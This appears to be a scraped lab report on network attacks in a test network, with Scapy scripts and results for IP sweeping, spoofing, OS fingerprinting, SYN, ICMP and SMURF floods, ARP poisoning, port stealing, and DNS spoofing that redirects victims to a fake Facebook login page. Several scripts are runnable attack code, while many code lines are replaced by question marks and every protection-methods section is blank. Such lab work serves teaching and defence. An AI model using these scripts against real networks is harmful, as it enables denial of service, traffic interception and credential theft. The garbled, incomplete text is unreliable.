Professional Documents
Culture Documents
Attacks-SEt of Attacks
Attacks-SEt of Attacks
1. Network overview
Network topology:
Notes
-
IP addressing: static
Intra-AS dynamic routing protocol: RIP
Internet access: through NAT service set up on R1
DNS forwarding: R1 forwards DNS queries to ISP DNS server
Host 192.168.52.124 runs Windows 95 or Backtrack according to the attack
2. Network attacks
2.a. IP address sweeping
Attacker: 192.168.50.252
Victims: the whole network
GOAL: Understand which hosts are active in the network
How? Send ICMP echo requests to all possible IPs and check who
replies
Scapy code executed by the attacker:
# builds an ICMP echo request to all possible active hosts in known
network segments
# sends ICMP echo requests and waits for replies (discards host
unreachable replies from routers)
Results:
The attacker discovers active hosts
Wireshark filter: icmp.type == 0
?????????????????????????????????
Results:
The attacker discovers victims active TCP ports (ftp: 21, ssh: 22, http: 80)
Wireshark filter: tcp.flags.syn==1 and tcp.flags.ack==1
?????????????????????????????????????????????????????????
2.c. IP options
Attacker: 192.168.52.124 (with Backtrack)
Victim: 192.168.50.253
Other host involved: 192.168.52.253
GOAL: perform various types of attack using the IP options
field in the IP datagram
How? Send a packet with the proper IP option set
2.c.I.Internet timestamp
This option provides a means for recording the time at which each system processed the sent datagram.
The timestamp option has a number of security implications:
-
Results:
We send to the victim an ICMP echo request with timestamp option properly set, getting back a timestamp
This option lets the originating system specify a number of intermediate systems a packet must pass
through to get to the destination host. The receiving host (end-system) must use the reverse of the path
contained in the received LSRR option. Source-routing is used to let the attacker see responses during a
spoofing attack. If an attacker is launching an attack against system V from system H, he can spoof all his
traffic to look as though it came from system S, by manufacturing each packet with source=S, destination=V
and a source-route that makes it look like it has passed through H on its way. For lots of protocols, V is
supposed to use the reverse of the source-route for all its responses, so H can see the responses on the
way back.
2.c.III. Stream ID
The Stream Identifier option originally provided a means for the 16-bit SATNET stream Identifier to be
carried through networks that did not support the stream concept. This option is obsolete and it is ignored
by modern systems.
Scapy code executed by the attacker:
target = "192.168.50.253" # victim
# IP option:
# -type: 136 (\x88) stream ID
# -length: 4 (\x04) bytes
# -stream ID: 257 (\x01\x01)
ip=IP???????????????????????????????????????????
send(ip)
Results:
We send to the victim an ICMP echo request with stream ID option set
??????????????????????????????????????????????????????????????????????
10
2.d. IP spoofing
Attacker: 192.168.50.252
Victim: 192.168.52.126
Spoofed IP: 192.168.50.254
GOAL: Interact with victim anonymously, hiding the real IP
address behind another one (fake or real)
How? In our example, we send TCP SYN to victim, built up with a
fake IP address source
Scapy code executed by the attacker:
target = "192.168.52.126" # victim
spoofedip = "192.168.50.254" # another active host: Win7
# builds a TCP SYN packet with destination port 139
syn = IP(src=spoofedip, dst=target)/TCP(dport=139, flags="S")
# the source is spoofed, so replies will be sent to the spoofed
address instead of the victim's one
send(syn) # sends the SYN packet
Results:
The victim replies to the spoofed IP address instead of the real source, but receives a RST
The spoofed address receives a SYN-ACK without having sent a SYN request
Note: obviously the attacker cant see the replies (sent to another station or to a fake address)
Proposed protection methods:
-
???????????????????????????????????????????????????????????????????????????
11
Results:
The attacker identifies the victims OS analysing the replies
For the analysis we can use a passive OS fingerprinting tool like p0f
In this case, p0f fails to detect Windows XP running on 192.168.52.126, while correctly detect the Linux
system running on 192.168.51.254 (even if with low accuracy )
Proposed protection methods:
-
???????????????????????????????????????????????????????????
12
13
Host 192.168.51.254 doesnt reply to our packets: this is the typical (correct according to RFC) behaviour of
Linux OSs; while host 192.168.52.126 replies with a RST-ACK: this is the typical (wrong according to RFC)
behaviour of Windows OSs (refer to the code comments for more details about the correct behaviour
suggested by the RFC)
Proposed protection methods:
-
??????????????????????????????????????????????????????
14
15
Results:
The attacker sends the packet to victim host, causing a BSOD error
The system doesnt crash, but its network functionalities are totally compromised
??????????????????????????????????????????????
16
2.h. No flags
Attacker: 192.168.52.254
Victim1: 192.168.51.254 (Ubuntu Server)
Victim2: 192.168.52.126
GOAL: OS fingerprinting (detect the OS running on the victim
station)
How? send a TCP packet with no flags set (anomalous) to an
open TCP port on the victim host and check its behaviour
Scapy code executed by the attacker:
Note: This code attacks only one host
target = "192.168.52.126" # victim
# builds a TCP packet with no flag set and an open port on the victim
host as dport
fin = IP(dst=target)/TCP(sport=RandShort(), dport=139, flags="")
ans = 0
# sends the packet and waits for a possible reply
ans = sr1(fin, retry=2, timeout=3)
# according to the protocol RFC a system shouldn't reply to a packet
with no flag set, however some systems reply with a RST; after some
tests, we noticed that windows systems reply with RST, while Linux
systems (correctly) don't reply!
if not ans:
print "No answer from target...probably Linux (UNIX like)"
else:
print "RST received...probably Windows"
Results:
The attacker identifies the victims OS analysing their behaviour
17
Host 192.168.51.254 doesnt reply to our packets: this is the typical (correct according to RFC) behaviour of
Linux OSs; while host 192.168.52.126 replies with a RST-ACK: this is the typical (wrong according to RFC)
behaviour of Windows OSs (refer to the code comments for more details about the correct behaviour
suggested by the RFC)
Proposed protection methods:
-
?????????????????????????????????????????????????????
18
2.i. SYN-flood
Attacker: 192.168.50.252
Victim: 192.168.51.254 (Ubuntu Server)
GOAL: Perform a DoS attack against the victim
How? Send a huge number of TCP SYN to an open TCP port on
the victim host using a spoofed IP; for each request, the victim
system responds with a SYN-ACK and waits (until timeout) for an ACK which will never come (SYN-ACK sent
to a fake spoofed IP address); the SYN queue will be soon filled with SYN_RCVD connections, preventing the
establishment of legitimate TCP connection.
Scapy code executed by the attacker:
target = "192.168.51.254" # victim
while True: # floods the target's port 80 (web server) with TCP SYN
spoofedip = RandIP() # random spoofed source IP
# builds a TCP SYN packet with destination port 80
????????????????????????????????????????????
# the source is spoofed, so replies will be sent to the spoofed
address instead of the attacker's one
send(syn) # sends the SYN packet
Results:
The victim sends SYN-ACK replies to the spoofed IP address, so no corresponding ACKs are received
???????????????????????????????????????????????????????????????????????????????????????
19
The SYN queue is soon filled with SYN_RCVD connections waiting for an ACK (that will never come)
And the web server running behind port 80 on 192.168.51.254 is no longer reachable
???????????????????????????????????????????????
20
With spoofing
target = "192.168.52.126" # victim
spoofedip = "192.168.52.125" # another active host: XP1
echo = ??????????????????????????????? # spoofed source
# flood the victim with a huge number of ICMP echo requests
send(echo, loop=1)
Results:
In a short period of time, the victim receives a lot of ICMP echo requests and sends replies, quickly
saturating its bandwidth
In the spoofed version, the spoofed IP address receives the echo replies
21
Note: this attack is effective only if the attacker has much more bandwidth than the victim
Proposed protection methods:
-
???????????????????????????????????????????????
22
23
Results:
The victim is downloading a file from a web server running on 192.168.51.254:80, but the TCP connection is
reset by malicious ICMP destination unreachable messages; the attack succeeds because the TCP protocol
shouldnt ignore Hard error messages like destination unreachable protocol unreachable.
????????????????????????????????????????????????????????????????????????
24
Results:
We craft ICMP redirect messages using the victims default gateway as spoofed source (redirects are sent
by routers; the victim will consider these messages only if received from his default gateway) and
suggesting the attacker host as better gateway to reach R1, which is the victims default DNS server (R1
forwards DNS queries to ISP name server)
25
as a result all the DNS traffic coming from the victim passes through the attacker
The attacker doesnt forward the DNS queries creating a black hole that cut the victims access to the
WWW
Proposed protection methods:
-
????????????????????????????????????????????????
26
Results:
The victim receives the malicious packets coming from spoofed IPs
27
????????????????????????????????????????????????????????????????
28
Results:
The victim systems replies itself continuously and locks up
Proposed protection methods:
-
?????????????????????????????????????????????????????
29
Results:
The overlapping issue leads the victim system to a crash
???????????????????????????????????????????????????????
Proposed protection methods:
-
?????????????????????????????????????????????????
30
Results:
Generally, sending a 65,536 byte ping packet is illegal according to the IP protocol, but a packet of such a
size can be sent if it is fragmented; when the target computer reassembles the packet, a buffer overflow
can occur, which often causes a system crash.
This attack usually crashes a vulnerable system; however, in our tests, the victim just locks up during the
attack and returns operative if the attack is stopped. In conclusion, we are not able to exactly emulate,
using scapy, the behaviour of the original PING of Death C code (available in Internet).
Proposed protection methods:
-
????????????????????????????????????????????????????????????
31
2.q. SMURF
Attacker: 192.168.52.252
Victim: 192.168.52.126
Other involved hosts: subnet 192.168.52.128/25
GOAL: Saturate victims bandwidth
How? Send a huge number of spoofed broadcast ICMP echo
requests using the victims IP address as source
Scapy code executed by the attacker:
target = "192.168.52.126" # victim
# broadcast address of the subnet (192.168.52.128/25) used to perform
the attack
smurfnet = "192.168.52.255"
# builds a broadcast ICMP echo request
echo = ?????????????????????????????????????
send(echo, loop=1)
Results:
The attacker continuously sends spoofed broadcast ICMP echo requests using the victims IP address as
source; consequently, each host in the attackers subnet sends replies to the victim
32
As a result, the victim is flooded by ICMP echo replies coming from the attackers subnet
Note: the effectiveness of a SMURF attack is based on the number of networks involved and of course on
the size of these networks; many big networks are needed to obtain a good result
Proposed protection methods:
??????????????????????????????????????????????????????????????
33
Results:
The attacker poisons the victims ARP table and the default gateways ARP table:
-
the router binds the attackers MAC address to the victims IP address
the victim binds the attackers MAC address to the routers IP address
Attacker
Attacker
All the traffic from the victim to an host outside the subnet (Ubuntu server, running a web server and an ftp
server in our test) will now pass through the attacker
35
So the attacker may simply want to sniff the traffic gathering interesting information (IP forwarding has to
be enabled on the attacker system)
or simply drop the traffic creating a black hole and preventing the victim to communicate with hosts
outside the subnet
Proposed protection methods:
-
???????????????????????????????????????????????
36
Results:
Vyatta doesnt use CAM tables, so this attack is not effective in our environment
Another layer 2 attack is Port stealing
Attacker: 192.168.50.252
Victims: subnet 192.168.50.0/24
Switch involved: R1 (br0)
GOAL: Intercept traffic directed to the victim
How? Flood the switch with Ethernet frames containing the
victims MAC address as source; the switch creates a bad association between the attackers port and the
victims MAC address
Scapy code executed by the attacker:
target = "08:00:27:99:65:d7" # victim
while True: # floods the connected switch
# creates a bad association between the attacker's port and the
victim's MAC address
sendp(Ether(dst=RandMAC(), src=target))
37
Results:
Even if Vyatta doesnt use CAM tables, the attack works. An association between the attackers port and
the victims MAC address is established and every packet sent to the victim by an host connected to the
switch is forwarded to the attacker; again the attacker can choose to forward the traffic to the victim (IP
forwarding enabled on the attacker system needed) or simply drop it. Here we have some ping replies
intercepted
???????????????????????????????????????????????????
38
39
Results:
The victim receives a fake DNS response which resolves the name www.facebook.com to the attackers IP
address
As a result, the victim is redirected to the fake login page running on attackers web server
Proposed protection methods:
-
?????????????????????????????????????????????????????
40